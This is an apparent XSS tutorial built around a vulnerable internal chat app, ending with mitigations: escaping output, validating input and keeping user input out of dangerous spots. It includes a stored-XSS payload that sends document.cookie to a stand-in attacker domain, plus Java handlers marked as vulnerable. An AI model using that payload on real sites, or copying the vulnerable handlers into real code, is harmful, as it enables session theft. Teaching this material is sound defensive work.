Cross-site scripting

Executing untrusted JavaScript in a trusted context.

XSS: the basics

What is XSS?

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website. Since the script came from a trusted website, it cannot be distinguished from a legitimate script.

About this lesson

In this lesson we will demonstrate how an XSS attack can play out in a chat application. Next, we will dive deeper and explain the various forms of XSS. Finally, we will study vulnerable code and learn how to fix it.

But before we jump into the lesson, have you ever heard of a self-retweeting tweet?

XSS in action

A self-retweeting tweet

In 2014, an Austrian teenager, @firoxl, was experimenting with his feed on Twitter, trying to make it display the Unicode ‘heart’ character. By doing so, he inadvertently discovered that Twitter’s feed was vulnerable to an XSS attack! @firoxl immediately reported the issue to Twitter, but it was too late. His discovery was already making the rounds on social media.

Less than two hours after @firoxl’s discovery, a German IT student, @derGeruhn, published a Tweet that exploited XSS to ... retweet itself. Thus, the self-retweeting tweet was released into the world. It retweeted itself hundreds of thousands of times and affected thousands of Twitter accounts, including @NYTimes and @BBCBreaking. To end its reign, Twitter had to take their whole feed offline.

On the left you will find an image that shows the content of the self-retweeting tweet. The tweet contains malicious JavaScript code which gets executed every time someone views the tweet in their feed. The script accesses the HTML of the Twitter page, finds the “retweet” button, and presses it to retweet itself.

To achieve its nefarious purposes, the script exploits an XSS vulnerability. Not sure how it works? Read on!

Vulnerable chat application

A company called startup.io decided to deploy an internal chat application for their employees. However, instead of using Slack, Discord or similar, the company chose to create its own chat service.

You are an engineer working for startup.io, and you’ve just learnt about the self-retweeting tweet that plagued Twitter a few years ago. You are curious to see if you could exploit your company’s chat web application in a similar way. You inform your in-house security team and your manager about your intentions, and then you get to work.

Fun fact: Twitch chat hacked live by XSS

Does our chat example seem unrealistic to you? Well, a similar scenario happened in the real world! In 2018, the Twitch streamer dwangoAC tried out an alpha version of a Twitch chat wrapper that was vulnerable to XSS. When his audience discovered the vulnerability, the stream quickly turned from a live video gaming event into a hacking contest. See the recording of that Twitch session on YouTube.

XSS under the hood

Same-origin policy

To understand what happened with the chat application, we need to take a quick detour and explain how the browser executes HTML and JavaScript. Each time you visit a website, your browser downloads HTML, CSS, and JavaScript from the server that hosts the website. The browser interprets and displays HTML and CSS and executes JavaScript.

JavaScript is a powerful programming language. For example, it is entirely possible to use it to mine bitcoins inside your browser. However, by design, when a piece of JavaScript is downloaded from a website, it can only access secrets (e.g. cookies) associated with that website. For instance, JavaScript code downloaded from startup.io cannot access cookies set by yourbank.com. If it could, it would be straightforward to steal sensitive information persisted by other websites, such as session tokens.

This isolation is called the “same-origin policy”, and it is enforced by the browser. In a nutshell, XSS is a vulnerability that sidesteps the same-origin policy: the injected script is served by the trusted website, so the browser treats it as that website’s own code and grants it access to that website’s secrets. And that’s what we did when we compromised the chat application. To understand what exactly happened, let’s take a look at the server code responsible for storing and displaying a chat message.

handleMessageSend is called on the backend each time any chat participant sends a message. Let’s consider what happens when we send a message such as:

<script> new Image().src="http://yourdomain.io/" + document.cookie; </script>
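
The lesson’s server code lives in an interactive widget that is not reproduced here. As a rough sketch of the kind of handler being described, assume a hypothetical in-memory message store and a generateMessageHTML helper that concatenates the message text into HTML without escaping. The class name, the store and both method bodies are assumptions made for illustration, not the lesson’s actual code:

```java
import java.util.ArrayList;
import java.util.List;

final class VulnerableChat {
    // Hypothetical stand-in for the chat database.
    private static final List<String> messages = new ArrayList<>();

    // Called for every message a participant sends: stores the raw text unchanged.
    static void handleMessageSend(String text) {
        messages.add(text);
    }

    // VULNERABLE: stored user input is concatenated into the HTML as-is.
    static String generateMessageHTML(String text) {
        return "<div class=\"message\">" + text + "</div>";
    }

    // Builds the chat page that every participant's browser downloads.
    static String renderChat() {
        StringBuilder html = new StringBuilder();
        for (String message : messages) {
            html.append(generateMessageHTML(message)).append('\n');
        }
        return html.toString();
    }
}
```

Under these assumptions, the payload above ends up in the page as a real script element, so every participant who opens the chat runs it and sends their cookies to the attacker’s domain.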

Extra: Stored vs reflected vs DOM-based XSS

The vulnerability you witnessed in the chat application is an example of stored XSS. It is called “stored” because the malicious JavaScript is persisted on the website's backend.

Reflected XSS and DOM-based XSS are two other types of XSS. Reflected XSS is similar to stored XSS, except that the malicious JavaScript does not get persisted by the application server. Instead, it gets “reflected” back to the user immediately. One typical example is a dynamically generated error page that includes user input in the error message. In DOM-based XSS, the malicious script is injected into the HTML on the client side, by JavaScript code that manipulates the DOM.
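
To make the reflected case more concrete, here is a minimal sketch of an error page that echoes a request parameter. The class, the notFoundPage method and the requestedPage parameter are hypothetical names chosen for this example:

```java
final class ReflectedErrorPage {
    // VULNERABLE: the value taken from the request is echoed straight back
    // into the response. Nothing is stored on the server.
    static String notFoundPage(String requestedPage) {
        return "<html><body><p>Page not found: " + requestedPage + "</p></body></html>";
    }
}
```

An attacker would not post anything to the site itself. Instead, they would trick a victim into following a link whose parameter carries the script, and the server would reflect it into the victim’s error page.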

There is much more to say about XSS and its different types. This lesson is only an introduction to XSS and barely scratches the surface. We will cover reflected XSS and DOM-based XSS in much more detail in future lessons.

What is the impact of XSS?

XSS allows hackers to inject malicious JavaScript into a web application. Such injections are extremely dangerous from the security perspective, and can lead to:

  • Stealing sensitive information, including session tokens, cookies or user credentials
  • Injecting multiple types of malware (e.g. worms) into the website
  • Changing the website appearance to trick users into performing undesirable actions

In addition, XSS is consistently among the most commonly reported web vulnerabilities. Do not take it lightly. Read on to learn how to mitigate XSS in your application.

Fun fact: Samy, the fastest spreading virus ever

In 2005, security researcher Samy Kamkar created an XSS worm named ‘Samy’. The worm was unleashed on the social networking site MySpace and affected over one million users within the first 20 hours of its lifetime, making it the fastest spreading virus of all time.

XSS mitigation

1. Find places where user input gets injected into a response

XSS is extremely common for a reason: we programmers very often inject user-supplied data into the responses we send back to users. The first step to mitigate XSS is to find all places in your code where this pattern occurs. Input data might be coming from a database or directly from a user request. Any data which might have originated from a user at any point in the past is suspect.

This is a daunting task and requires you to review your code carefully. Luckily, security scanners such as Snyk Code can automate most of the work for you.

2. Escape the output

Having identified all the places where XSS might be happening, it’s time to get your hands dirty and code your way out of danger. The first and most important XSS mitigation step is to escape your HTML output. To do that, you should HTML-encode all dangerous characters in the user-controlled data before injecting that data into your HTML output.

For example, when HTML-encoded, the character < becomes &lt; and the character & becomes &amp;. This way, the browser treats the encoded characters as text to display, i.e. it will not assume they are part of the HTML structure of your page.

Remember to encode all dangerous characters. Don’t assume only a subset of characters needs to be escaped for your specific use case. Bad guys are very creative and will always find ways to bypass your assumptions.

Instead of writing an escape function by yourself, use well-proven libraries such as Apache Commons Text or OWASP Encoder. If you work with Spring, you can also use Spring's HtmlUtils.htmlEscape.
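
To show what such a library call does to the payload, here is a deliberately small escape function written by hand so that the example has no dependencies. It is an illustration of the transformation only, under the assumption that the output is placed in HTML element content. The class and method bodies are hypothetical, and production code should call one of the libraries named above instead:

```java
final class HtmlEscapeSketch {
    // Illustration only: replaces the five characters most often treated as
    // dangerous in HTML element content with their entity references.
    static String escapeHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // The message text is escaped before it is placed inside the element.
    static String generateMessageHTML(String text) {
        return "<div class=\"message\">" + escapeHtml(text) + "</div>";
    }
}
```

With a library, the call to escapeHtml would be swapped for, say, HtmlUtils.htmlEscape(text) in Spring, Encode.forHtml(text) in OWASP Encoder, or StringEscapeUtils.escapeHtml4(text) in Apache Commons Text.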

3. Perform input validation

Be as strict as possible with the data you receive from your users. Before including user-controlled data in an HTTP response or writing it to a database, validate that it is in the format you expect. Never rely on blocklisting: the bad guys will always find ways to bypass it!

For instance, in our chat application, we expect the messageId to be a valid UUID and the senderEmail to be a valid email. Note that in the example we changed generateMessageHTML to generateSenderHTML. This demonstrates two layers of defence to prevent XSS with the senderEmail parameter: we both validate it before saving it to a database and later escape it when injecting it into HTML.

We can use Apache Commons Validator, which has validation functions for many common data types. For UUID validation, we can use the built-in UUID.fromString method from java.util.
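
A minimal sketch of both checks using only the standard library follows. The class name, the method names and the email pattern are assumptions made for this example. In particular, the pattern is intentionally simple and strict, and stands in for a proper validator such as the one in Apache Commons Validator:

```java
import java.util.UUID;
import java.util.regex.Pattern;

final class MessageValidation {
    // Hypothetical, deliberately narrow pattern used only for illustration.
    private static final Pattern SIMPLE_EMAIL =
            Pattern.compile("^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}$");

    // UUID.fromString can accept shortened groups such as "1-1-1-1-1",
    // so the parsed value is compared with the input to require the
    // canonical 36-character form.
    static boolean isValidUuid(String value) {
        if (value == null) {
            return false;
        }
        try {
            return UUID.fromString(value).toString().equalsIgnoreCase(value);
        } catch (IllegalArgumentException e) {
            return false;
        }
    }

    static boolean isValidEmail(String value) {
        return value != null && SIMPLE_EMAIL.matcher(value).matches();
    }
}
```

A handler would reject the request when either check fails, before anything is written to the database. With Apache Commons Validator on the classpath, isValidEmail could instead delegate to EmailValidator.getInstance().isValid(value).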

It is mandatory to perform type validation of user input before writing it to a database. However, it is also strongly recommended to validate data after reading it from the database. This can save us when the database gets compromised, and the malicious data gets injected through means other than the vulnerable API we secured in the previous paragraph. To validate data read from a database, you can use the validation techniques we presented above. Alternatively, we recommend using trusted database libraries that perform type validation out of the box, for example, ORM libraries.

4. Don’t put user input in dangerous places

The above mitigations are effective in situations where user input is used as the content of an HTML element (e.g. <div> user_input </div> or <p> user_input </p>). However, there are certain locations where you should never put user-controlled input. These locations include:

  • Inside the <script> tag
  • Inside CSS (e.g. inside the <style> tag)
  • Inside an HTML attribute (e.g. <div attr=user_input>)

There are some exceptions to the above rules, but explaining them goes beyond the scope of this lesson. If you do need to place user-controlled input inside any of the listed locations, please follow the OWASP Prevention Cheat Sheet for more detailed advice.

Fun fact: Internet Explorer had built-in support for XSS

In older versions of Internet Explorer, XSS was possible with the use of ... images. In some cases, IE tried to guess the MIME type of a document. Unfortunately, IE did not excel at making such guesses. As a result, IE often mistook images for HTML files, and executed all JavaScript code embedded in an image file.

Congratulations

You’ve taken your first step into understanding XSS and preventing it from affecting your code! We hope you will apply your new knowledge wisely and make your applications safer. Please rate how valuable this lesson was and provide feedback to make it better. Also, make sure to check out our lessons on other common vulnerabilities.
